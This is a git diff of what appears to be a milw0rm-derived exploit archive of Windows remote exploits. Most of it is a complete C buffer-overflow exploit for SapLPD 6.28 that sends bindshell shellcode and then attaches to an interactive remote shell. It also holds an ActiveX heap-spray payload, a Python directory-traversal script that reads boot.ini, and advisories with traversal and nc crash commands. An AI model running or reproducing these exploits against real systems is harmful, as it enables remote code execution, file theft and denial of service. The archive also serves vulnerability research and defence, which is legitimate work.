-SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout)
-{
-	struct sockaddr_in sock_in;
-	struct timeval timeout;
-	DWORD fdWrite[2];
-	DWORD fdExcept[2];
-	SOCKET s;
-	int slResult;
-	int val=1,len=sizeof(int);
-	
-	s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-	if (s==INVALID_SOCKET)
-		return SOCKET_ERROR;
-
-	ioctlsocket(s,FIONBIO,(u_long*)&val);
-
-	fdWrite[0]=fdExcept[0]=1;
-	fdWrite[1]=fdExcept[1]=s;
-
-	memset(&sock_in,0,sizeof(sock_in));
-	sock_in.sin_port=wPort;
-	sock_in.sin_family=AF_INET;
-	sock_in.sin_addr.s_addr=dwIP;
-
-	connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in));
-
-	timeout.tv_sec=dwTimeout/1000;
-	timeout.tv_usec=dwTimeout%1000;
-
-	slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout);
-	switch(slResult)
-	{
-		case -1:
-		case 0:
-		{
-			closesocket(s);
-			return SOCKET_ERROR;
-		}
-
-		default:
-		{
-			if (!FD_ISSET(s,(fd_set*)&fdExcept)) 
-			{
-				val=0;ioctlsocket(s,FIONBIO,(u_long*)&val);
-				return s;
-			}
-			break;
-		}
-	}
-
-	closesocket(s);
-	return SOCKET_ERROR;
-}
-
-/* ripped from TESO code and modifed by ey4s for win32 */
-void Shell(int s)
-{
-	int l;
-	char buf[512];
-	struct timeval time;
-	unsigned long ul[2];
-
-	time.tv_sec=1;
-	time.tv_usec=0;
-
-	while(1)
-	{
-		ul[0]=1;
-		ul[1]=s;
-
-		l=select(0,(fd_set*)&ul,NULL,NULL,&time);
-		if(l==1)
-		{
-			l=recv(s,buf,sizeof(buf),0);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-			l=write(1,buf,l);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-		}
-		else
-		    {
-			l=read(0,buf,sizeof(buf));
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-			l=send(s,buf,l,0);
-			if (l<=0)
-			{
-				printf("\r\n[-] connection closed.\n");
-				return;
-			}
-		}
-	}
-}
-
-void ShowBanner(void)
-{
-	printf("%s",ASCII_SHIT);
-}
-
-void ShowSploit(void)
-{
-	printf("\t\tSAPlpd 6.28 Multiple Remote Buffer Overflows\r\n");
-	printf("\t\t        Advisory by Luigi Auriemma\r\n");
-	printf("\t\t           Exploit By BackBone\r\n");
-	printf("\r\n");
-}
-
-void ShowUsage(char* argv)
-{
-	int i;
-
-	printf("[*] %s host/ip[:port] target [bindport]\r\n",argv);
-	printf("[*] Default port: %d - Default bindport: %d\r\n",DEFAULT_PORT,BIND_PORT);
-	printf("[*] Target(s):\r\n\r\n");
-	for (i=0;i<(sizeof(targets)/sizeof(v));i++)
-		printf("\t%2d: %s (0x%08x)\r\n",i,targets[i].lpVersion,targets[i].dwRetAddr);
-}
-
-int main(int argc, char* argv[])
-{
-	LPSTR lpHost,lpPort;
-	ULONG ulIP;
-	USHORT usPort;
-	USHORT usBindPort;
-	SOCKET sSock;
-	int iTarget;
-	int iLen=0;
-	char lpBuffer[16384];
-
-	ShowBanner();
-	ShowSploit();
-
-	// check arguments
-	if (argc<3||argc>4)
-	{
-		ShowUsage(argv[0]);
-		return -1;
-	}
-
-	// get host/ip
-	lpHost=strtok(argv[1],":");
-	// get port
-	lpPort=strtok(NULL,":");
-	if (lpPort)	usPort=(USHORT)atoi(lpPort);
-	else usPort=DEFAULT_PORT;
-
-	// startup winsock
-	if (!StartupWinsock())
-	{
-		printf("[-] WSAStartup() Failed.\r\n");
-		return -1;
-	}
-
-	// resolve host
-	ulIP=LookupAddress(lpHost);
-	if (ulIP==INADDR_NONE)
-	{
-		printf("[-] Invalid IP/Host.\r\n");
-		WSACleanup();
-		return -1;
-	}
-
-	// get target 
-	iTarget=atoi(argv[2]);
-	if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1)
-	{
-		printf("[-] Invalid target.\r\n");
-		WSACleanup();
-		return -1;
-	}
-
-	printf("[+] Target: %s (0x%08x)\r\n",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr);
-
-	if (argc==4) usBindPort=(USHORT)atoi(argv[3]);
-	else usBindPort=BIND_PORT;
-	SET_BIND_PORT(usBindPort);
-
-	// connecting
-	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
-		(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort);
-
-	// connect
-	sSock=TCPConnect(ulIP,htons(usPort),10000);
-	if (sSock==SOCKET_ERROR)
-	{
-		printf("Failed!\r\n");
-		WSACleanup();
-		return -1;
-	}
-
-	printf("Ok.\r\n");
-
-	// construct buffer
-	memset(lpBuffer,0,sizeof(lpBuffer));
-
-	*lpBuffer=targets[iTarget].bLPDCmd;
-	iLen+=1;
-
-	memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode));
-	iLen+=targets[iTarget].dwOffset-sizeof(shellcode);
-
-	memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode));
-	iLen+=sizeof(shellcode);
-
-	memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4);
-	iLen+=4;	
-
-	memcpy(lpBuffer+iLen,"\xE9\x98\x08\x00\x00",5); // jmp esp will execute this code, jmp to shellcode
-	iLen+=5;
-
-	memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte
-	iLen+=1;
-
-	printf("[+] Sending buffer (size:%d) ... ",iLen);
-
-	// send buffer
-	if (send(sSock,lpBuffer,iLen,0)<=0)
-	{
-		printf("Failed!\r\n");
-		WSACleanup();
-		return -1;
-	}
-
-	printf("Ok.\r\n");
-	
-	closesocket(sSock);
-
-	Sleep(1000);
-
-	// connecting
-	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
-		(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort);
-
-	// connect to bindshell
-	sSock=TCPConnect(ulIP,htons(usBindPort),10000);
-	if (sSock==SOCKET_ERROR)
-	{
-		printf("Failed!\r\n");
-		WSACleanup();
-		return -1;
-	}
-
-	printf("Ok.\r\n\r\n");
-
-	// shell
-	Shell(sSock);
-
-	closesocket(sSock);
-
-	WSACleanup();
-	
-	return 0;
-}
-
-// milw0rm.com [2008-02-07]
+/*
+	http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html
+
+	Exploit for SapLPD 6.28 Win32 by BackBone
+	Tested with SapLPD 6.28 on Windows XP SP2
+
+	Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest!
+*/
+
+#include 
+#include 
+#include 
+#pragma comment (lib,"ws2_32")
+
+#define DEFAULT_PORT 515
+
+char ASCII_SHIT[]=
+"\r\n"
+"\t\t   ______              ______\r\n"  
+"\t\t  (, /   )        /)  (, /   )\r\n"
+"\t\t    /---(  _   _ (/_    /---(  _____    _\r\n" 
+"\t\t ) / ____)(_(_(__/(__) / ____)(_) / (__(/_\r\n"
+"\t\t(_/ (               (_/ (    (c) 2008\r\n"
+"\r\n";
+
+struct
+{
+	LPSTR lpVersion;
+	DWORD dwOffset;
+	DWORD dwRetAddr;
+	BYTE  bLPDCmd;
+}
+targets[]=
+{
+	// exploit works with cmd 0x01,0x02,0x03,...
+	{"SAPLPD Version 6.28 for Windows/NT (TEST)",484,0x0012F0A1,0x01}, // addr of shellcode -> 0x0012F0A1
+	{"SAPLPD Version 6.28 for Windows/NT",484,0x004E0BB7,0x01}, // jmp esp 0x004E0BB7 -> SAPLpd.exe 6.28
+},v;
+
+
+// don't change the offset
+#define PORT_OFFSET 170
+#define BIND_PORT   10282
+
+// bindshell shellcode from www.metasploit.com,mod by skylined
+unsigned char shellcode[] =
+  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
+  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
+  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
+  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
+  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
+  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
+  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
+  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
+  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
+  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
+  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
+  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
+  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
+  "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
+  "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
+  "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
+  "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
+  "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
+  "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
+  "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
+  "\x83\xc4\x5c\x61\xeb\x89";
+
+#define SET_BIND_PORT(p) *(USHORT*)(shellcode+PORT_OFFSET)=htons(p);
+
+BOOL StartupWinsock(void)
+{
+	WSADATA wsa;
+
+	return !WSAStartup(MAKEWORD(2,0),&wsa);
+}
+
+DWORD LookupAddress(LPSTR lpHost)
+{
+	DWORD dwRemoteAddr=inet_addr(lpHost);
+
+	if (dwRemoteAddr==INADDR_NONE)
+	{
+		struct hostent* pHostEnt=gethostbyname(lpHost);
+		if (pHostEnt==0)
+			return INADDR_NONE;
+		dwRemoteAddr = *((DWORD*)pHostEnt->h_addr_list[0]);
+	}
+
+	return dwRemoteAddr;
+}
+
+SOCKET TCPConnect(DWORD dwIP,WORD wPort,DWORD dwTimeout)
+{
+	struct sockaddr_in sock_in;
+	struct timeval timeout;
+	DWORD fdWrite[2];
+	DWORD fdExcept[2];
+	SOCKET s;
+	int slResult;
+	int val=1,len=sizeof(int);
+	
+	s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
+	if (s==INVALID_SOCKET)
+		return SOCKET_ERROR;
+
+	ioctlsocket(s,FIONBIO,(u_long*)&val);
+
+	fdWrite[0]=fdExcept[0]=1;
+	fdWrite[1]=fdExcept[1]=s;
+
+	memset(&sock_in,0,sizeof(sock_in));
+	sock_in.sin_port=wPort;
+	sock_in.sin_family=AF_INET;
+	sock_in.sin_addr.s_addr=dwIP;
+
+	connect(s,(struct sockaddr*)&sock_in,sizeof(sock_in));
+
+	timeout.tv_sec=dwTimeout/1000;
+	timeout.tv_usec=dwTimeout%1000;
+
+	slResult=select(0,NULL,(fd_set*)&fdWrite,(fd_set*)&fdExcept,&timeout);
+	switch(slResult)
+	{
+		case -1:
+		case 0:
+		{
+			closesocket(s);
+			return SOCKET_ERROR;
+		}
+
+		default:
+		{
+			if (!FD_ISSET(s,(fd_set*)&fdExcept)) 
+			{
+				val=0;ioctlsocket(s,FIONBIO,(u_long*)&val);
+				return s;
+			}
+			break;
+		}
+	}
+
+	closesocket(s);
+	return SOCKET_ERROR;
+}
+
+/* ripped from TESO code and modifed by ey4s for win32 */
+void Shell(int s)
+{
+	int l;
+	char buf[512];
+	struct timeval time;
+	unsigned long ul[2];
+
+	time.tv_sec=1;
+	time.tv_usec=0;
+
+	while(1)
+	{
+		ul[0]=1;
+		ul[1]=s;
+
+		l=select(0,(fd_set*)&ul,NULL,NULL,&time);
+		if(l==1)
+		{
+			l=recv(s,buf,sizeof(buf),0);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+			l=write(1,buf,l);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+		}
+		else
+		    {
+			l=read(0,buf,sizeof(buf));
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+			l=send(s,buf,l,0);
+			if (l<=0)
+			{
+				printf("\r\n[-] connection closed.\n");
+				return;
+			}
+		}
+	}
+}
+
+void ShowBanner(void)
+{
+	printf("%s",ASCII_SHIT);
+}
+
+void ShowSploit(void)
+{
+	printf("\t\tSAPlpd 6.28 Multiple Remote Buffer Overflows\r\n");
+	printf("\t\t        Advisory by Luigi Auriemma\r\n");
+	printf("\t\t           Exploit By BackBone\r\n");
+	printf("\r\n");
+}
+
+void ShowUsage(char* argv)
+{
+	int i;
+
+	printf("[*] %s host/ip[:port] target [bindport]\r\n",argv);
+	printf("[*] Default port: %d - Default bindport: %d\r\n",DEFAULT_PORT,BIND_PORT);
+	printf("[*] Target(s):\r\n\r\n");
+	for (i=0;i<(sizeof(targets)/sizeof(v));i++)
+		printf("\t%2d: %s (0x%08x)\r\n",i,targets[i].lpVersion,targets[i].dwRetAddr);
+}
+
+int main(int argc, char* argv[])
+{
+	LPSTR lpHost,lpPort;
+	ULONG ulIP;
+	USHORT usPort;
+	USHORT usBindPort;
+	SOCKET sSock;
+	int iTarget;
+	int iLen=0;
+	char lpBuffer[16384];
+
+	ShowBanner();
+	ShowSploit();
+
+	// check arguments
+	if (argc<3||argc>4)
+	{
+		ShowUsage(argv[0]);
+		return -1;
+	}
+
+	// get host/ip
+	lpHost=strtok(argv[1],":");
+	// get port
+	lpPort=strtok(NULL,":");
+	if (lpPort)	usPort=(USHORT)atoi(lpPort);
+	else usPort=DEFAULT_PORT;
+
+	// startup winsock
+	if (!StartupWinsock())
+	{
+		printf("[-] WSAStartup() Failed.\r\n");
+		return -1;
+	}
+
+	// resolve host
+	ulIP=LookupAddress(lpHost);
+	if (ulIP==INADDR_NONE)
+	{
+		printf("[-] Invalid IP/Host.\r\n");
+		WSACleanup();
+		return -1;
+	}
+
+	// get target 
+	iTarget=atoi(argv[2]);
+	if (iTarget<0||iTarget>(sizeof(targets)/sizeof(v))-1)
+	{
+		printf("[-] Invalid target.\r\n");
+		WSACleanup();
+		return -1;
+	}
+
+	printf("[+] Target: %s (0x%08x)\r\n",targets[iTarget].lpVersion,targets[iTarget].dwRetAddr);
+
+	if (argc==4) usBindPort=(USHORT)atoi(argv[3]);
+	else usBindPort=BIND_PORT;
+	SET_BIND_PORT(usBindPort);
+
+	// connecting
+	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
+		(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usPort);
+
+	// connect
+	sSock=TCPConnect(ulIP,htons(usPort),10000);
+	if (sSock==SOCKET_ERROR)
+	{
+		printf("Failed!\r\n");
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok.\r\n");
+
+	// construct buffer
+	memset(lpBuffer,0,sizeof(lpBuffer));
+
+	*lpBuffer=targets[iTarget].bLPDCmd;
+	iLen+=1;
+
+	memset(lpBuffer+iLen,0x90,targets[iTarget].dwOffset-sizeof(shellcode));
+	iLen+=targets[iTarget].dwOffset-sizeof(shellcode);
+
+	memcpy(lpBuffer+iLen,shellcode,sizeof(shellcode));
+	iLen+=sizeof(shellcode);
+
+	memcpy(lpBuffer+iLen,&targets[iTarget].dwRetAddr,4);
+	iLen+=4;	
+
+	memcpy(lpBuffer+iLen,"\xE9\x98\x08\x00\x00",5); // jmp esp will execute this code, jmp to shellcode
+	iLen+=5;
+
+	memset(lpBuffer+iLen,0x41,1);// saplpd zeroes this byte
+	iLen+=1;
+
+	printf("[+] Sending buffer (size:%d) ... ",iLen);
+
+	// send buffer
+	if (send(sSock,lpBuffer,iLen,0)<=0)
+	{
+		printf("Failed!\r\n");
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok.\r\n");
+	
+	closesocket(sSock);
+
+	Sleep(1000);
+
+	// connecting
+	printf("[+] Connecting to %d.%d.%d.%d:%d ... ",ulIP&0xFF,(ulIP>>8)&0xFF,
+		(ulIP>>16)&0xFF,(ulIP>>24)&0xFF,usBindPort);
+
+	// connect to bindshell
+	sSock=TCPConnect(ulIP,htons(usBindPort),10000);
+	if (sSock==SOCKET_ERROR)
+	{
+		printf("Failed!\r\n");
+		WSACleanup();
+		return -1;
+	}
+
+	printf("Ok.\r\n\r\n");
+
+	// shell
+	Shell(sSock);
+
+	closesocket(sSock);
+
+	WSACleanup();
+	
+	return 0;
+}
+
+// milw0rm.com [2008-02-07]
diff --git a/platforms/windows/remote/5087.html b/platforms/windows/remote/5087.html
index 20c1da6cb..39c3f8eb6 100755
--- a/platforms/windows/remote/5087.html
+++ b/platforms/windows/remote/5087.html
@@ -1,89 +1,89 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-02-09]
+
+
+
+
+
+
+
+# milw0rm.com [2008-02-09]
diff --git a/platforms/windows/remote/51.c b/platforms/windows/remote/51.c
index fa21b50a1..55e265be3 100755
--- a/platforms/windows/remote/51.c
+++ b/platforms/windows/remote/51.c
@@ -259,6 +259,6 @@ int sock, sck, h,i,j;
    printf("[+] Successfull, attempting to join shell ...\n\n");
    shell(sck);
    return 0;           
-}
-
-// milw0rm.com [2003-07-08]
+}
+
+// milw0rm.com [2003-07-08]
diff --git a/platforms/windows/remote/5100.html b/platforms/windows/remote/5100.html
index e46d9460e..8c1412acc 100755
--- a/platforms/windows/remote/5100.html
+++ b/platforms/windows/remote/5100.html
@@ -1,120 +1,120 @@
-
-
- 
-  ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit
-  
-  
- 
-	
-		Unable to create object
-	
- 
-
-
-# milw0rm.com [2008-02-10]
+
+
+ 
+  ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX Buffer Overflow Exploit
+  
+  
+ 
+	
+		Unable to create object
+	
+ 
+
+
+# milw0rm.com [2008-02-10]
diff --git a/platforms/windows/remote/5102.html b/platforms/windows/remote/5102.html
index 147ba061a..45a312ec1 100755
--- a/platforms/windows/remote/5102.html
+++ b/platforms/windows/remote/5102.html
@@ -1,47 +1,47 @@
-
-	
-		
-	
-
-
-
-
-# milw0rm.com [2008-02-12]
+
+	
+		
+	
+
+
+
+
+# milw0rm.com [2008-02-12]
diff --git a/platforms/windows/remote/5153.asp b/platforms/windows/remote/5153.asp
index bef0ea089..b2e720d4f 100755
--- a/platforms/windows/remote/5153.asp
+++ b/platforms/windows/remote/5153.asp
@@ -1,37 +1,37 @@
-<%@ LANGUAGE = JavaScript %>
-<%
-
-var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
-
-//run calc.exe
-var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
-
-var bigblock = unescape("%u9090%u9090");
-
-var headersize = 20;
-
-var slackspace = headersize+shellcode.length;
-
-while (bigblock.length
-
-# milw0rm.com [2008-02-19]
+<%@ LANGUAGE = JavaScript %>
+<%
+
+var act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");
+
+//run calc.exe
+var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
+
+var bigblock = unescape("%u9090%u9090");
+
+var headersize = 20;
+
+var slackspace = headersize+shellcode.length;
+
+while (bigblock.length
+
+# milw0rm.com [2008-02-19]
diff --git a/platforms/windows/remote/5188.html b/platforms/windows/remote/5188.html
index 759e5180a..523af0ac3 100755
--- a/platforms/windows/remote/5188.html
+++ b/platforms/windows/remote/5188.html
@@ -1,29 +1,29 @@
-
-
-Rising Online Scanner Insecure Method Vulnerability
-
-
-
-

    
-wait for a few seconds after clicking the button
-
-
-# milw0rm.com [2008-02-25]
+
+
+Rising Online Scanner Insecure Method Vulnerability
+
+
+
+

    
+wait for a few seconds after clicking the button
+
+
+# milw0rm.com [2008-02-25]
diff --git a/platforms/windows/remote/5190.html b/platforms/windows/remote/5190.html
index 2172d8c93..86466dca6 100755
--- a/platforms/windows/remote/5190.html
+++ b/platforms/windows/remote/5190.html
@@ -1,119 +1,119 @@
-
-
- 
-  
-  
-  
-  
-
- 
- 
-
-
-# milw0rm.com [2008-02-26]
+
+
+ 
+  
+  
+  
+  
+
+ 
+ 
+
+
+# milw0rm.com [2008-02-26]
diff --git a/platforms/windows/remote/5193.html b/platforms/windows/remote/5193.html
index 3d13f23c1..9a3320fba 100755
--- a/platforms/windows/remote/5193.html
+++ b/platforms/windows/remote/5193.html
@@ -1,73 +1,73 @@
-
-
-
-
-
-
-
-# milw0rm.com [2008-02-26]
+
+
+
+
+
+
+
+# milw0rm.com [2008-02-26]
diff --git a/platforms/windows/remote/5205.html b/platforms/windows/remote/5205.html
index ca29f2983..2e156f45b 100755
--- a/platforms/windows/remote/5205.html
+++ b/platforms/windows/remote/5205.html
@@ -1,122 +1,122 @@
-
-
- 
-  Symantec BackupExec Calendar Control(PVCalendar.ocx) BoF Exploit
-  
-  
- 
-	
-		Unable to create object
-	
- 
-
-
-# milw0rm.com [2008-02-29]
+
+
+ 
+  Symantec BackupExec Calendar Control(PVCalendar.ocx) BoF Exploit
+  
+  
+ 
+	
+		Unable to create object
+	
+ 
+
+
+# milw0rm.com [2008-02-29]
diff --git a/platforms/windows/remote/5212.py b/platforms/windows/remote/5212.py
index 26ca76043..21f3135bf 100755
--- a/platforms/windows/remote/5212.py
+++ b/platforms/windows/remote/5212.py
@@ -1,32 +1,32 @@
-import socket
-import sys
-
-print '---------------------------------------------------------'
-print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
-print 'Project URL: http://miniwebsvr.sourceforge.net/'
-print 'Author: gbr'
-print 'Tested on Windows XP SP2'
-print '---------------------------------------------------------'
-
-host = "127.0.0.1"
-port = 8080
-
-if sys.argv[1:]:
-        host = sys.argv[1]
-        if sys.argv[2:]:
-                port = int(sys.argv[2])
-
-try:
-        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        s.connect((host, port))
-        s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
-        while True:
-                data = s.recv(4096)
-                if not data:
-                        break
-                print data
-
-except:
-        print "Connection Error"
-
-# milw0rm.com [2008-03-03]
+import socket
+import sys
+
+print '---------------------------------------------------------'
+print 'MiniWebSvr 0.0.9a Directory Transversal Vulnerability'
+print 'Project URL: http://miniwebsvr.sourceforge.net/'
+print 'Author: gbr'
+print 'Tested on Windows XP SP2'
+print '---------------------------------------------------------'
+
+host = "127.0.0.1"
+port = 8080
+
+if sys.argv[1:]:
+        host = sys.argv[1]
+        if sys.argv[2:]:
+                port = int(sys.argv[2])
+
+try:
+        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        s.connect((host, port))
+        s.send("GET /%../../../../../../../../../../../boot.ini HTTP/1.0\r\n\r\n")
+        while True:
+                data = s.recv(4096)
+                if not data:
+                        break
+                print data
+
+except:
+        print "Connection Error"
+
+# milw0rm.com [2008-03-03]
diff --git a/platforms/windows/remote/5228.txt b/platforms/windows/remote/5228.txt
index d8bb12ecc..ba22a8c52 100755
--- a/platforms/windows/remote/5228.txt
+++ b/platforms/windows/remote/5228.txt
@@ -1,98 +1,98 @@
-#######################################################################
-
-                             Luigi Auriemma
-
-Application:  Acronis PXE Server
-              http://www.acronis.com/enterprise/products/snapdeploy/
-Versions:     <= 2.0.0.1076
-Platforms:    Windows
-Bugs:         A] directory traversal
-              B] NULL pointer
-Exploitation: remote
-Date:         08 Mar 2008
-Author:       Luigi Auriemma
-              e-mail: aluigi@autistici.org
-              web:    aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bugs
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
-The Acronis PXE Server is an essential component of Acronis Snap Deploy
-Server, a deployment solution for automatically configuring all the
-clients of the local network.
-
-
-#######################################################################
-
-=======
-2) Bugs
-=======
-
-----------------------
-A] directory traversal
-----------------------
-
-The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
-downloading of the bootstrap files (uploading is not allowed).
-This service is vulnerable to a classical directory traversal and an
-arbitrary path attacks which allow an attacker to download any file
-from the local disks or the network shares.
-
-
----------------
-B] NULL pointer
----------------
-
-An incomplete TFTP request (anything which goes from the simple absence
-of the option field to the usage of only the 2 bytes for the opcode)
-causes the crashing of the PXE Server due to a NULL pointer access.
-
-
-#######################################################################
-
-===========
-3) The Code
-===========
-
-
-A]
-http://aluigi.org/testz/tftpx.zip
-
-  tftpx SERVER ..\../..\../boot.ini none
-  tftpx SERVER c:\boot.ini none
-  tftpx SERVER \\internal_host\documents\file.txt none
-
-B]
-send the bytes 00 01 to UDP port 69 of the server:
-
-  echo -n -e \x00\x01|nc SERVER 69 -v -v -u
-
-
-
-#######################################################################
-
-======
-4) Fix
-======
-
-
-No fix
-
-
-#######################################################################
-
-# milw0rm.com [2008-03-10]
+#######################################################################
+
+                             Luigi Auriemma
+
+Application:  Acronis PXE Server
+              http://www.acronis.com/enterprise/products/snapdeploy/
+Versions:     <= 2.0.0.1076
+Platforms:    Windows
+Bugs:         A] directory traversal
+              B] NULL pointer
+Exploitation: remote
+Date:         08 Mar 2008
+Author:       Luigi Auriemma
+              e-mail: aluigi@autistici.org
+              web:    aluigi.org
+
+
+#######################################################################
+
+
+1) Introduction
+2) Bugs
+3) The Code
+4) Fix
+
+
+#######################################################################
+
+===============
+1) Introduction
+===============
+
+
+The Acronis PXE Server is an essential component of Acronis Snap Deploy
+Server, a deployment solution for automatically configuring all the
+clients of the local network.
+
+
+#######################################################################
+
+=======
+2) Bugs
+=======
+
+----------------------
+A] directory traversal
+----------------------
+
+The PXE Server (pxesrv.exe) implements a TFTP server for allowing the
+downloading of the bootstrap files (uploading is not allowed).
+This service is vulnerable to a classical directory traversal and an
+arbitrary path attacks which allow an attacker to download any file
+from the local disks or the network shares.
+
+
+---------------
+B] NULL pointer
+---------------
+
+An incomplete TFTP request (anything which goes from the simple absence
+of the option field to the usage of only the 2 bytes for the opcode)
+causes the crashing of the PXE Server due to a NULL pointer access.
+
+
+#######################################################################
+
+===========
+3) The Code
+===========
+
+
+A]
+http://aluigi.org/testz/tftpx.zip
+
+  tftpx SERVER ..\../..\../boot.ini none
+  tftpx SERVER c:\boot.ini none
+  tftpx SERVER \\internal_host\documents\file.txt none
+
+B]
+send the bytes 00 01 to UDP port 69 of the server:
+
+  echo -n -e \x00\x01|nc SERVER 69 -v -v -u
+
+
+
+#######################################################################
+
+======
+4) Fix
+======
+
+
+No fix
+
+
+#######################################################################
+
+# milw0rm.com [2008-03-10]
diff --git a/platforms/windows/remote/5230.txt b/platforms/windows/remote/5230.txt
index 76a008051..997dee518 100755
--- a/platforms/windows/remote/5230.txt
+++ b/platforms/windows/remote/5230.txt
@@ -1,77 +1,77 @@
-#######################################################################
-
-                             Luigi Auriemma
-
-Application:  Argon Client Management Services
-              http://www.argontechnology.com/product.aspx/cid1/43
-Versions:     <= 1.31 (TFTP Boot Server <= 2.5.3.1)
-Platforms:    Windows
-Bug:          directory traversal in TFTP Boot Server
-Exploitation: remote
-Date:         08 Mar 2008
-Author:       Luigi Auriemma
-              e-mail: aluigi@autistici.org
-              web:    aluigi.org
-
-
-#######################################################################
-
-
-1) Introduction
-2) Bug
-3) The Code
-4) Fix
-
-
-#######################################################################
-
-===============
-1) Introduction
-===============
-
-
->From vendor's website:
-"Client Management Services® (CMS) includes all the server-based
-services (PXE Server, BOOTP Server) and administration tools needed to
-setup an open network boot environment. You can deploy your favorite
-third party client management tools in a pre-OS booting phase."
-
-
